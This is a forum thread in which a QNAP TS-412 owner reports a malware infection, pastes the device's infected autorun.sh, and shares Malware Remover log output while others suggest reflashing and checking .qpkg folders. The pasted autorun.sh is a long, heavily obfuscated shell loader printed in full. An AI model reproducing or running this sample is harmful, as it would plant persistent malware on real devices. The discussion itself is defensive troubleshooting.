Suspect I have a virus/malware on TS-412. How do I remove?

[zxlife]

Hi,
I have a TS-412 running RAID5 on 4 x 2TB WD RED drives.

Despite the CPU and RAM not showing much activity, I'm thinking I've got some malware infection because:
- logging into the NAS drive via the web interface takes ages (e.g. over a minute to get the login page to actually appear)
- if/when I do manage to log in I often get the "The Server is busy..." message before being able to navigate anywhere
- opening App Center has taken over 15 minutes at times.
- I've seen two QPKG files with random names on it
- Opening a shell with putty takes 20-30 seconds for login prompt to appear, and 20-30 seconds between each prompt/command
- I've no idea what a typical autorun.sh file should look like, but mine looks like this (after mounting using mount -t ext2 /dev/mtdblock5 /tmp/config: (see end of message below)

I've closed my external ports but I can't even do anything with the device because it is so unresponsive. Can anyone advise my next steps?

Thanks
Chris

Code: Select all

PgfHXAc=${RIpzmnHUUoKf}${MFQtAc}tr; QFKTlU=$CyAxhoUXgonetX$""\\$jKCbTyQuUtflIF$""; IrUIIq=${TUrOiGRrytia}${NWJUvOFBpTvX}${QFKTlU}1${JMRAtueqaSkr}33${AskChz}; hTMuqJ=${eSkQYtRTpCxj}${AGnyQkaQoEGI}${QFKTlU}0${jrDUClplPvuP}55${BtfTtf}; mUFKAJof=${QsOmYBStoRvv}${sbizinUMSIvH}${QFKTlU}1${uILiITXcrcdO}34${qZpdjz}; $PgfHXAc 'qLkPUEcA% '$mUFKAJof'fGnFsZ+|I&a>D}ui";rv'"'"'joTY*]BW'$IrUIIq'mN\nx)VwSlM`He({b$pXCyJh<R#=zK'$hTMuqJ'!OtdgQ' ' KzG%)h\n!e"`anX'$IrUIIq'cTE'$mUFKAJof'ldVS*DC'$hTMuqJ'BWxsw$JNp]iot'"'"'YmZ|vQquF#OgLjA+>=}U{(HfP;krR&y<IbM'<<"meFBnLga"|b${HjmyHT}a${NvSxAcHlLrQfhyh}s${rEFdq}h
`%/gBn/'cAAWwY bdYXoJLiTxZS{K<|C[KAN-anWxX\II\A'Tu*#<N
XoJF[#>rGGCoJN-anWxC13oJ&<WnSwuDx{C3AbiekbYXoJr-xSrlOCoJN-anWxC05oJLb*#WVju||C5Az>b
y y+XoJT(FrlvHCoJN-anWxC13oJjwiODrR&+dC4AoWwY bdYqmU]Wt<hv
=>!cd{|NFQwESZ$%kD[Inp;n}X(b'i&r*G#mobiekbYmHm\m\ml)\aMOC yqmo'Tu*#<N
mfzRxB+-juJLKVmoz>b
y y+mT`YgoPemqm;$p}v[\h=ajF&|!tX{#<gmo'Tu*#<N
mZq%eRD*YC'V(Hm\m\m)WuidIncwUnyP-kxJKoLl+]>zmobiekbYmSMf`G
NTQrmoz>b
y y+mb BEOmtt\ Q |>\)oJwy-QeZwnCgG'oJSZ&aCcAuk/Sol/}"#g<p& h%wYfEFvyCwYfEn:/Sol:/}Sol:/s} /Sol:/s} /}Sol:/s} /Sol/c11:/s} /d&$Jd/}Sol:/s} /d&$Jd/Solv#$&LLJl>%BX%>o lJLg%W/>gX/lsdd%2W|1%ii%>o lJLg%
P%C%hg}h%BM%vy1v%||%g$"&%v.v%||% ghs l=%d&$Jd% FvyC1mvyC1uutZk/znvnv=%$J}g%y %ol%/tZk/zt/tiZk/zt/tP% FvyC m/tnv=%g$"&%vyC mvyC uutZk/znvnv==%t/tP%g$"&%yC mmZk/zn==%vvP%g$"&%y1==%tP%g$"&%.==%g}J$=%n#hg}h%B>%/gh$/$&l[oD%||%$&l[>o F/gh$/$&l[oD%ii%C%hg}h%B>%/Llh/ErY_abbf/.$&l[oD%||%$&l[>o F/Llh/ErY_abbf/.$&l[oD=%n#$&LLJl>%BX%Dgh$[D%W%/>gX/lsdd%2W|1%ii%Dgh$[D%
P%C%}g>%Bl%'E=yC<=}/`
.t`#`Z'vyC1//`//```/nv'z`i^`Z'vyC1//`//```/nv'z`P`#//G=}/`
^`i`#`P`ZZ^`#z`]`z`#.t//pn'%vyC4:ByC$&l[>o n/s(ols<.$&l[nv%i%}g>%Bl%'}/^'vyC2//`//```/nv'%`?F%`?`
.t`P/`1/Gp'=%n#S>o F#hg}h%B[%vyC$&l[>o n/}LS.$&l[v%||%[& %o%ol%"&Lg}%wsSdo$%r&!ld&J>%IsdhoLg>oJ%TgS%ag$& >olD}=%>&%S>o FjDgh$[D%vyov%pJh"%B[%vyC$&l[>o n/}LS.$&l[vj%||%hg}h%k%BM%vyS>o v%||%S>o Fj>o lJLg%vyS>o vj%||%hg}h%B>%vyS>o v%||%hg}h! ohgJSdgFy
LxhgLp%vyCS>o n/.hLp.ccccccvP%||% L%vyChg}h! ohgJSdgnv%||%S gJx=%S>o F''=%>&lg#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv%||%C%$&LLJl>%BX% gJ>dolx%W/>gX/lsdd%2W|1%ii%dl%B}[%/Sol/Ss}eS&<%/s} /Sol/ gJ>dolx=%[& %o%ol%"&Lg}%wsSdo$%r&!ld&J>%IsdhoLg>oJ%TgS%ag$& >olD}=%>&%S>o Fj gJ>dolx%v/}"J g/yConv%2W/>gX/lsddj%||%hg}h%k%BM%vyS>o v%||%S>o Fj>o lJLg%vyS>o vj%||%S>o F/}"J g/yCS>o uut/n%||%hg}h%B>%vyS>o v%||%S gJx=%>&lg=#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv=%n%||%C%S>o FjDgh$[D%AEYa{_r{-%>g[R&dIw%B[%vyC$&l[>o n/>g[_}"J g.ol[&vj#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv=%n%||%C%S>o FjL&slh%i%}g>%Bl%v}/.t`
`/}"J g`/Z^%/z`]`P%.t/`1/Dpv%i%"gJ>%Bl%1j#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv=%n%||%C%[& %o%ol%*Y*E{r{R3_rYfY%*Y*E{r{R2_rYfY%*Y*E{r{R1_rYfY%Ir0_rYfY=%>&%hg}h%B>%v/}"J g/yConv%||%S>o Fv/}"J g/yConv%||%S gJx=%>&lg=#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv%||%S>o F/Llh/ErY_abbf=%n#J $"_&FjslJLg%BL%i%D gp%Bo%v<86`ioZ3B6z86v%W%/>gX/lsdd%||%g$"&%<86%ii%g$"&%J Lj#splpSolFy
g$"&%Tjg$"&%Blg%v``<73``<6Jvjewjg$"&%Blg%v``<63``<78``<6Jvj}cjg$"&%Blg%v``<69``<65``<6>vj%i%h %vUK\h EXlSqr *bxA{wIoY"Y}v%vlOAw(rG{c<G cp!* )OsErV vP#$DoFy
g$"&%J[jg$"&%Blg%v``<6>``<6S``<75vjcjg$"&%Blg%v``<70``<69vj%i%h %vJc+}!R;w[>e(dR$rTISGE{v%v\XMKII$-Iqb;f<pUS>x}lwvP#}}"SolFy
g$"&%Mjg$"&%Blg%v``<74``<63vjfRjg$"&%Blg%v``<6J``<65``<6Svj%i%h %vE T)SSw-;-p*flQgw[H+O}xR}v%v"SpI}KIYV)(l(LDLe*J<o$)J&vP#}}""xgeFy
g$"&%&&Djg$"&%Blg%v``<6[``<65``<66``<74vjlHdjg$"&%Blg%v``<69``<75``<61``<68vjxAfjg$"&%Blg%v``<66``<70``<6>``<71vj%i%h %vR}}S>OfQ*gSl!+JQsgXM&v%v-+QD;Qcb$hYh*V*&Rgd"<vP#}}"Jsh"Fy
g$"&%Ijg$"&%Blg%v``<61``<67vjoGpjg$"&%Blg%v``<67``<69``<6S``<6$vj%i%h %v((GL[acU$*}wV\ogEsa->Jv%vI>e\)c T.s>YQ"Qxa&Gb(HvP#}}"$&l[Fy
g$"&%sjg$"&%Blg%v``<64``<7JvjKjg$"&%Blg%v``<77``<6gvj%i%h %v&f+M"hRKwIQcJSHhc-L"v%v&JQl>sdUMSAg)UsxJ$-OvP#J $"J LFy
g$"&%-(jg$"&%Blg%v``<66``<62``<69vj Sbjg$"&%Blg%v``<6>``<76``<76``<76vjHjg$"&%Blg%v``<68``<6[vj%i%h %vSI[gd(wDUM$<!cSL*(&;Udv%vcg+h){S>lLQOcAggUqQIRIvP#J $"<86Fy
g$"&%f()jg$"&%Blg%v``<65``<75``<78``<67vj*"jg$"&%Blg%v``<6J``<77``<6>vjA&;jg$"&%Blg%v``<69``<6S``<69``<65vj%i%h %v;X+JSRx}"DdRaseA$"D"ohwv%vXx>J!(qXs !bpe.)!GrV"{lvP#opJh"Fy
g$"&%J>jg$"&%Blg%v``<75``<6$``<63vjGojg$"&%Blg%v``<6J``<69``<7Jvj;& jg$"&%Blg%v``<7J``<6J``<73``<78vj%i%h %vw<d{rs>E+")b{S}eep}Ev%vHbQ d<!U}fbIAqp+XR-.vP#$ &l}Fy
g$"&%{SXjg$"&%Blg%v``<74``<65``<6J``<61vjMMxjg$"&%Blg%v``<77``<61``<6J``<72vj.)jg$"&%Blg%v``<67``<69``<73vj%i%h %vTfolRSQ+a >s)RxQhSlRM;-v%vfTeV(&axdED[I.Yf&.p\MEovP#J $"FjslJLg%BL%i%D gp%Bo%v<86`ioZ3B6z86v%W%/>gX/lsdd%||%g$"&%vyJ $"<86v%ii%g$"&%vyJ $"J Lvj#hg}h%B[%v./yCJ $"nv%||%}>o Fjp!>j%ii%C%hg}h%vyCUYAE_Ab)a*{Z0znv%||%}>o Fy
%$>%vy
%>o lJLg%vyCUYAE_Ab)a*{Z0znv%Pv%||%p!>%P%ii%C%hg}h%vyC0nv%||%}>o Fy
%$>%vy
%>o lJLg%vyC0nv%Pv%||%p!>%P=%n%||%hg}h%B[%vyC}>o n/yCJ $"nv%||%$>%vyC}>o nv=%n%ii%C%hg}h%B[%v/hLp/$&l[oD/yCJ $"nv%||%$>%/hLp/$&l[oD=%n%ii%C#L>o Fy
LxhgLp%B>%/hLp/.L&slh.ccccccP%ii%C%L>o F/hLp/.L&slh.QSS<H&S=%Lx>o %yCL>o n=%n#__Ubbf_r{RF#__L&>gdFjDgh$[D%Ae}hgL%vGlhg lJd%I&>gdvj#*b;-G\_r{R_;br{FjDgh$[D%v*b;-G\%AfbaY\{v%r{RG*{_;br{%B[%/gh$/pdJh[& L.$&l[j#*b;-G\_r{R_wYafFjDgh$[D%v*b;-G\%AfbaY\{v%-A_Y*fGR{_wYafGfGb;%B[%/gh$/pdJh[& L.$&l[j#*b;-G\_r{R_-AFjDgh$[D%v*b;-G\%AfbaY\{v%-A_fKw{%B[%/gh$/pdJh[& L.$&l[j#__Ubbf_*b;-Fjhg}h%B[%/gh$/>g[Jsdh_$&l[oD/Ubbf.$&l[%||%$Jh%/gh$/>g[Jsdh_$&l[oD/Ubbf.$&l[%2W/>gX/lsdd%ii%$Jh%vyC$&l[>o n/Ubbf.$&l[vj%ii%C%hg}h%vyJ $"_&v%F%J L%||%__Ubbf_*b;-FfAB;YAYaI=%n%#$&LLJl>%BX%"Jd_Jpp%W%/>gX/lsdd%2W|1%||%C%__Ubbf_r{RFy
"Jd_Jpp%BBDgh_S&&h_p>%p& h_o>F0P=%n#hg}h%vyC__Ubbf_*b;-nv%F%fAB;YAYaI%ii%hg}h%vyJ $"_&v%F%J L%||%C%hg}h%B[%/gh$/GA_fYA%||%__Ubbf_r{RFvyC__Ubbf_r{R:B/>gX/Lh>Sd&$xn7v%ii%__Ubbf_r{RFvyC__Ubbf_r{R:B/>gX/Lh>Sd&$xn5v=%n%ii%__Ubbf_r{RFvyC__Ubbf_r{R:B/>gX/}><n6v#hg}h%v<yC*b;-G\_r{R_;br{nv%kF%v<v%||%C%sSoJhhJ$"%BL%vyC*b;-G\_r{R_wYafnv%B>%2=%L&slh%Bh%sSo[}%sSo2:$&l[oD%vyCL>o nv%W%/>gX/lsdd%2W|1%ii%C%hg}h%B[%/gh$/GA_fYA%||%L&slh%Bh%g<h4%/>gX/LL$Sdx0p7%vyCL>o nv=%n%n%ii%L&slh%yC__Ubbf_r{Rn%Bh%g<h2%yCL>o n%ii%C%hg}h%vyC__L&>gdnv%F%vfAB201v%||%L&slh%Bh%g<h2%/>gX/Lh>Sd&$x4%yCL>o n=%n%ii%C%sSoJhhJ$"%BL%vyC*b;-G\_r{R_wYafnv%B>%2=%L&slh%Bh%sSo[}%sSo2:$&l[oD%vyCL>o nv=%L&slh%Bh%g<h4%/>gX/LL$Sdx0p7%vyCL>o nv=%n%ii%C%hg}h%vyC__L&>gdnv%F%vfAB269(v%||%L&slh%Bh%g<h2%/>gX/}>$6%yCL>o n=%n%ii%C%hg}h%vyC__L&>gdnv%F%vfAB869v%||%L&slh%Bh%g<h2%/>gX/}>o6%yCL>o n=%n%ii%C%hg}h%vyJ $"_&v%F%J L%ii%yC__Ubbf_*b;-n%F%vfAB;YAYaIv%||%C%[& %o%ol%5%7%4%6%3%8=%>&%L&slh%Bh%g<h2%v/>gX/Lh>Sd&$xyConv%yCL>o n%||%S gJx=%>&lg=%n=%n%ii%C%hg}h%vyJ $"_&v%F%<86%||%[& %l%ol%/>gX/}>$%/>gX/}><%/>gX/}>o%y__Ubbf_r{R=%>&%[& %o%ol%6%y*b;-G\_r{R_wYaf=%>&%L&slh%Bh%g<h2%yClnyCon%yCL>o n%||%S gJx%2=%>&lg=%>&lg=%n%ii%C%L&slh%Bh%g<h2%y
/}Sol/"Jd_Jpp%BBDgh_S&&h_p>%p& h_o>F0P6%yCL>o n=%n=%n#[& %[odg%ol%vyC}}"Solnv%vyCsplpSolnv%v.v=%>&%hg}h%B[%vyCS>o n/.yCopJh"n/yC[odgnv%ii%S gJx=%>&lg#hg}h%vy[odgv%kF%v.v%ii%hg}h%k%B[%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v%||%C%hg}h%B}%.Ubbf_fGI{%||% gJ>%B %S&&hhoLg%N%.Ubbf_fGI{%ii%g$"&%j>Jhg%]m}j%W%.Ubbf_fGI{=%hg}h%B}%vyCS>o n/.Ubbf_fGI{v%||% gJ>%B %S&&hhoLg%N%vyCS>o n/.Ubbf_fGI{v%ii%g$"&%j>Jhg%]m}j%W%vyCS>o n/.Ubbf_fGI{v=%hg}h%vyS&&hhoLgv%ii%C% gJ>%B %S&&hhoLg%N%.Ubbf_fGI{=%hg}h%B}%vyCS>o n/.Ubbf_fGI{v%||% gJ>%B %S&&hhoLg%N%vyCS>o n/.Ubbf_fGI{v=%n=%hg}h%vyS&&hhoLgv%||%C%}dggp%2=%Z%yS&&hhoLg%BDh%0%z%||%gFy

%j>Jhg%]m}j%B%yS&&hhoLg%PP%||%Z%yg%BDh%0%z%||%Z%yg%Bdh%1296000%z%||%C%hg}h%vyL>o v%||%hg}h%Bg%vyCL>o nv%||%C%$>%/=%}"%B$%v}dggp%5=%sL&slh%yCL>o n=% L>o %yCL>o nv%|%n=%l&g<F1=%n=%n=%n#hg}h%vyl&g<v%F%1%ii%C# L%vyCS>o n/.Ubbf_fGI{v# L%.Ubbf_fGI{#hg}h%k%B[%v./yCJ $"nv%||%hg}h%B>%vyCL>o nv%||%hg}h%B[%vyCL>o n/yCJ $"nv%||%$>%vyCL>o nv#h>o FjLxhgLp%B>%vyCS>o n/.hgLp.ccccccv%ii%LxhgLp%B>%v/}"J g/wsSdo$/.hgLp.ccccccv%ii%LxhgLp%B>%v/Llh/ErY_abbf/.hgLp.ccccccvj#hg}h%B>%vyh>o v%ii%C%[& %o%ol%vyS>o v%v/}"J g/wsSdo$v%v/Llh/ErY_abbfv=%>&%Lx>o %vyCon/.hgLp.QSS<H&Sv%W%/>gX/lsdd%2W|1%||%hg}h%B>%vyCon/.hgLp.QSS<H&Sv%||%h>o FvyCon/.hgLp.QSS<H&Sv=%>&lg=#hg}h%B>%vyh>o v=%n%ii%C%h>o FjLxhgLp%B>%/hLp/.hgLp.ccccccj%||%hg}h%B>%vyh>o v=%n%ii%C%Lx>o %v/hLp/.hgLp.QSS<H&Sv%||%h>o F/hLp/.hgLp.QSS<H&S%||%hg}h%B>%vyh>o v=%n%ii%C%h>o FjLxhgLp%B>%.ccccccj%||%hg}h%B>%vyh>o v=%n%ii%C%Lx>o %v.QSS<H&Sv%||%h>o Fv.QSS<H&Sv%||%hg}h%B>%vyh>o v=%n%ii%h>o Fjp!>j#$p%vyCJ $"nv%yCh>o n#$>%yCh>o n#hJ %B<M[%vyCJ $"nv#D gp%B-%''%NN{b-%W/>gX/lsdd%2W|1%||%[D gpFvD gp%B-v%ii%C%$&LLJl>%BX%[D gp%W/>gX/lsdd%2W|1%||%[D gpF[D gp%ii%[D gpFD gp=%n##{b-#hg}h%vy[D gpv%ii%[D gpFD gp##hg}h%B>%vyCS>o n/.yCopJh"nv%ii%Lx>o %Bp%vyCS>o n/.yCopJh"nv%ii%Lx>o %vyCS>o n/.yCopJh"nv##hg}h%B[%vy$Dov%||%$"L&>%755%vy$Dov%||%v./yC$Donv##hg}h%B[%/hLp/+pxD.$&l[.SJx%||%C%h&s$"%B$ %/hLp/+pxD.$&l[.SJx%vyC$&l[>o n/+pxD.$&l[v=% L%/hLp/+pxD.$&l[.SJx=%n##$p%Bp%yC$ &l}n%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v%ii%C%$p%yC$ &l}n%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v=%h&s$"%B$ %/Sol/Ss}eS&<%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v=%n##$"L&>%755%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v##o[%Z%B[%vyC$&l[>o n/$ &lhJSv%z=%h"gl#hg}h%vyaY;rbIv%ii%aY;rbIF12499#hg}h%y

%yaY;rbI%|%1%PP%F%0%||%}pJ$gF'%'%ii%}pJ$gF''#$ &lLol}Fvy

%yaY;rbI%m%4%PPv#hg}h%k%vy$ &lLol}v%Bg+%0%||%$ &lLol}FvyC$ &lLol}n0v%#y[D gp%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v%vyC$&l[>o n/$ &lhJSv%W/>gX/lsdd%2W|1%ii%C%dFy

%
j!$%Bd%N%vyC$&l[>o n/$ &lhJSvj%/%3P%]%1PP=%hg}h%vydv%BDh%0%||%}g>%Bo%vyCdnv'o'vy$ &lLol}v'%t%t%t%t%'vyCS>o n/.yCopJh"n/yC$ &l}n.}"v'%W'vy}pJ$gv'/>gX/lsdd%2W|1'%vyC$&l[>o n/$ &lhJSv%ii%g$"&%vy$ &lLol}v'%t%t%t%t%'vyCS>o n/.yCopJh"n/yC$ &l}n.}"v'%W'vy}pJ$gv'/>gX/lsdd%2W|1v'%WW%vyC$&l[>o n/$ &lhJSv%||%/gh$/oloh.>/$ &l>.}"% g}hJ h%W%/>gX/lsdd%2W|1%||%h&s$"%B$ %yC$&l[>o n/JpJ$"g%yC$&l[>o n/$ &lhJS=%n#[o##[& %[odg%ol%vyC}}"Solnv%vyCsplpSolnv=%>&%hg}h%B[%vyCS>o n/.yCopJh"n/yC[odgnv%ii%$p%Bp%vyC[odgnv%vyCS>o n/.yCopJh"n/yC[odgnv%ii%C%$p%vyC[odgnv%vyCS>o n/.yCopJh"n/yC[odgnv=%h&s$"%B$ %/Sol/Ss}eS&<%vyCS>o n/.yCopJh"n/yC[odgnv=%n%>&lg#$"L&>%755%vyCS>o n/.yCopJh"n/yC}}"Solnv#$"L&>%755%vyCS>o n/.yCopJh"n/yCsplpSolnv##D gp%'J>Lol:`y1`y`y*&{aD7elQK(}Q2Q4DdV34`.:'%/gh$/}"J>&!%W/>gX/lsdd%2W|1%||%C#k%hg}h%B>%vyCS>o n/.d&Dv%||%Lx>o %vyCS>o n/.d&Dv#k%hg}h%B[%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%||%C%$p%Bp%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%ii%$p%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do=%n%||%g$"&%'uk/Sol/}"#wbAfrYfYFvv#hg}h%v<yCa{H){Af_I{fEbrnv%F%<wbAf%||%C%#$J}g%vyC*b;f{;f_({;\fEnv%ol%'v''v'%i%tZk0B9zt%i%0t%P%[Jd}g%==%tP%hg}h%vyC*b;f{;f_({;\fEnv%Bdh%2147483646%==%g}J$%||%C%G-AF% gJ>%B>%'v''v'%B l%vyC*b;f{;f_({;\fEnv%wbAfrYfY=%hg}h%BM%vywbAfrYfYv%||%wbAfrYfYFj>>%S}F1%$&slhFvy*b;f{;f_({;\fEv%2W/>gX/lsddj=%n%ii%hg}h%vywbAfrYfYv%ii%wbAfrYfYFj$Jhj%##hg}h%k%BM%vywbAfrYfYv%||%$J}g%vyCwbAfrYfYnv%ol%tp!>tP%hg}h%B[%v'yCS>o n'/.d&D/.$Do_d&Dv%ii%C%hg}h%B>%v'yCS>o n'/.d&Dv%ii%Lx>o %Bp%v'yCS>o n'/.d&Dv%||%h&s$"%v'yCS>o n'/.d&D/.$Do_d&Dv=%n%||%hg}h%y

j}hJh%B$%'v'v'm}'v'v'%v'yCS>o n'/.d&D/.$Do_d&DvjPP%Bdh%209715200%||%$Jh%WW%v'yCS>o n'/.d&D/.$Do_d&Dv%NN%{b-%==%g}J$=#ya{Ibf{_Yrra:ywbAfrYfY#{b-#n#hg}h%k%BM%vywbAfrYfYv%||%$J}g%vywbAfrYfYv%ol%ts}g FJ>Lolt%P%h sg%==%tP%[Jd}g%==%g}J$%ii%$J}g%vyH){aK_AfaG;\v%ol%ts}g FJ>LoltP%h sg%==%tP%[Jd}g%==%g}J$%||%C#$J}g%vyCa{Ibf{_Yrranv%ol%'v''v'%i%10.t%i%127.t%i%192.168.t%i%169.254.t%i%172.1Z6B9z.t%i%172.2Z0B9z.t%i%172.3Z01z.t%i%t:t%P%[Jd}g%==%tP%h sg%==%g}J$%||%D gp%'v'v'J>Lol:`y1`y`y*&{aD7elQK(}Q2Q4DdV34`.:'v'v'%/gh$/}"J>&!%W/>gX/lsdd%2W/>gX/lsdd%||%g<oh%0#n#o[%k%hg}h%BM%vywbAfrYfYv=%h"gl%#g<g$%BJ%vyC0nv%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%NN%R4q(rLK!X$#ywbAfrYfY#R4q(rLK!X$#gd}g#g<g$%BJ%vyC0nv%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do#[o#g<oh%0'%W%/"&Lg/"hhp>/$DoBSol/_Jsh"(&Dol.$Do#hg}h%vy?v%F%0%||%hg}h%B}%/"&Lg/"hhp>/$DoBSol/_Jsh"(&Dol.$Do%||%hg}h%B}%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%||%LX%/"&Lg/"hhp>/$DoBSol/_Jsh"(&Dol.$Do%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do%||%$"L&>%755%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do%||%h&s$"%B$ %/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do#n##.%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v#$>%vyC}>o nv# L%B [%vyCh>o nv#hg}h%vyL>o v%||%hg}h%B>%vyL>o v%||%C%$>%/=%}"%B$%v}dggp%5=%sL&slh%yCL>o n=% L>o %yCL>o nv%|%n%#h sg=#n###uA Q |>AA`
meFBnLga

[Don]

Have installed and run malware remover?

[zxlife]

It was a struggle to get it installed with the sluggish response but yes, I left it installing last night, and it eventually installed and started scanning. It's reported that malware was detected and removed and I am now prompted to reboot which I am doing now. I'll report back.

[zxlife]

okay. I removed most of my apps including the two suspect ones via App Centre and installed Malware Remover.
The server then proceeded to do a scan automatically once it was installed.
It identified and removed some malware and prompted for a reboot.
After doing the reboot, the NAS drive is MUCH more responsive and looks in much better shape.
Thanks for your advice.

I've included part of my syslog below for what the malware remover found:

Code: Select all

Time	Content
02:56:24	[App Center] Music Station disabled.
02:58:12	[App Center] Photo Station disabled.
02:59:59	[App Center] Download Station disabled.
03:21:35	[myQNAPcloud] CloudLink service for myQNAPcloud web site is not available. You may not be able to manage or share the file(s)/folder(s) stored on this QNAP device via myQNAPcloud web site.
03:22:13	[myQNAPcloud] CloudLink service for myQNAPcloud web site is not available. You may not be able to manage or share the file(s)/folder(s) stored on this QNAP device via myQNAPcloud web site.
04:39:03	[App Center] Python3 removed.
04:40:09	[App Center] Video Station removed.
04:46:38	[App Center] IFTTT Agent removed.
04:52:25	[App Center] Photo Station removed.
05:00:37	[App Center] Download Station removed.
05:01:23	[App Center] wMGLOxwzFbe removed.
05:01:34	[App Center] Music Station removed.
05:02:30	[App Center] Media Streaming Add-on removed.
05:03:38	[App Center] Plex Media Server removed.
05:04:58	[App Center] Qsync Central removed.
05:06:21	[App Center] Installed Malware Remover 3.2.0 in /share/MD0_DATA/.qpkg/MalwareRemover.
05:07:27	[MalwareRemover] Started scanning.
05:07:41	[App Center] Enabled Malware Remover.
05:09:03	[MalwareRemover] The following malicious file/folder was found and removed: /tmp/.remover_3X8XQ0
05:09:24	[MalwareRemover] The following malicious file/folder was found and removed: /tmp/config//FKqeireOevvvQhj
05:09:43	[MalwareRemover] The following infected file/folder was found and recovered: /share/MD0_DATA/.kAImccZNHGwkec/.Tpfdvrj.sh
05:10:19	[MalwareRemover] The following infected file/folder was found and recovered: /share/MD0_DATA/.PgtlggqOktgFXgu/sdUookykBm.sh
05:10:36	[MalwareRemover] The following infected file/folder was found and recovered: /mnt/HDA_ROOT/.config/cups/XwDkvAdFejW
05:10:49	[MalwareRemover] The following malicious schedule was found and removed from the crontab: /share/MD0_DATA/.kAImccZNHGwkec/.Tpfdvrj.sh
05:10:53	[MalwareRemover] The following malicious schedule was found and removed from the crontab: /share/MD0_DATA/.PgtlggqOktgFXgu/sdUookykBm.sh
05:10:56	[MalwareRemover] The following malicious schedule was found and removed from the crontab: /mnt/HDA_ROOT/.config/cups/XwDkvAdFejW
05:12:06	[App Center] toSbeJjHVJd removed.
05:35:03	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/sys/ajaxRequest.cgi
05:35:06	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/iscsitargetsetting.cgi
05:35:10	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/disk/iscsitargetsetting.cgi
05:35:13	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/qid/share.cgi
05:35:19	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/QTSshare.cgi
05:35:22	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//iscsi_lun_usage.cgi
05:37:36	[MalwareRemover] Malware was detected and removed. You must restart the NAS.
05:57:12	[Antivirus] Virus definitions updated.
08:28:57	[Power Management] System restarting.
08:32:24	System was shut down on Thu Oct  4 08:32:24 BST 2018.
08:38:13	System started.
08:44:31	[myQNAPcloud] DDNS updated WAN IP address to [51.148.132.249]
08:45:15	[MalwareRemover] Started scanning.
08:48:03	[App Center] Installed Media Streaming Add-on 430.1.7.1 in /share/MD0_DATA/.qpkg/QDMS.
08:48:29	[App Center] Enabled Media Streaming Add-on.
09:02:40	[MalwareRemover] Scan completed.
10:29:04	[App Center] Java removed.
10:29:42	[App Center] QcloudSSLCertificate 2.1.14 has been installed in /mnt/ext/opt/QcloudSSLCertificate successfully.
10:29:55	[App Center] QcloudSSLCertificate enabled.

I've changed my admin password (it was a strong password so I don't think this was the vector used to inject malware but I've done it anyway)
Malware Remover is set to scan daily at 5am.
Do you think I'm safe to reopen the port forwarding on my router to allow https://*****.myqnapcloud.com to work again?

Thanks
Chris

[Don]

Is that the only port you had forwarded?

[Toxic17]

Personally I would not rely on the malware remover completing its task 100%. I'd reinitialise the NAS and restore from backup to be 100% sure the NAS is not infected - but then again, thats me...

[pawelson]

You are not safe yet.

Enter /share/CACHEDEV1_DATA/.qpkg] #

and then ls-l.

You will have folders with apps, and huge amount of them will have the same date of midification by the Malware. Mine was infected 25.08.2018 at 9 am. Inside of each folder you will have sh file with encrypted Malware Payload. Devs are working with new version of Malware Remover. Go to support and start the ticket, so they will see how many people have this problem.

Your machine was unresponsive because it was scanning and infecting other machines. Mine had over 5000 tcp connections and the router started to have problems handling this amount of connections.

Right now the only 100% safe solution is to wipe your NAS, REFLASH IT (because infected autorun.sh is in the DOM not on your disks) and then reinitialize machine.

You got infected by a security flaw in Music Station.

[UltimateAtrophy]

When you
Enter /share/CACHEDEV1_DATA/.qpkg] #

and then ls-l.

Is this from a terminal on the NAS? I probably got infected, but want to check and verify.

[Don]

Yes, from an SSH session.

[Vmanjeff]

Not trying to highjack but have a similar thing happening here. Malware Remover has suddenly sent me about 60 emails saying this file and that were removed. Some of the emails say the file was repaired. Here are several...

NAS Name: Triton-II
Severity: Warning
Date/Time: 2018/11/08 13:40:14

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.qpkg/TMDbTV/TMDbTV.sh.

NAS Name: Triton-II
Severity: Warning
Date/Time: 2018/11/08 13:39:33

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.qpkg/FileStation_HD/FileStation_HD.sh.


NAS Name: Triton-II
Severity: Warning
Date/Time: 2018/11/08 13:38:38

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Repaired infected file or folder. Name: /mnt/HDA_ROOT/update_pkg/helpdesk/www/System/Foundation/SupportUtilsModel.sh

This happened right around the time I updated some installed apps and I initially thought it might be just a quark and the NAS was telling me about files it deleted during the update process (even though I never had those types of indications before). Then I looked at some of the emails and came here to check on this.
Additionally I had a random shutdown the other night which prompted me to do a filesystem check but the check stalls at 1.5% complete.
